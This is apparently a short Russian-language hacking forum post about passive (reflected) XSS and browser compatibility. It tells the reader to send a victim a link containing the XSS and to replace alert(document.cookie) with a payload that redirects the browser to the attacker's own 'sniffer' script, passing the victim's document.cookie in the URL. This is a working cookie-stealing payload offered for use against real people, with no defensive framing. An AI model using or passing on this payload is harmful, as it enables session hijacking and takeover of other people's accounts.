и что, а у меня опера, xss с расчетом на один браузер - гопота. Ну если так хочется надеятся, что чел, кому ты скинешь ссылку, содержащую пассивную xss, будет именно в осле сидеть, то делай тоже самое:

вместо alert(document.cookie) просто вставь

window.location.href='http://твой_сайт_со_снифером/s.phpf?'+document.cookie;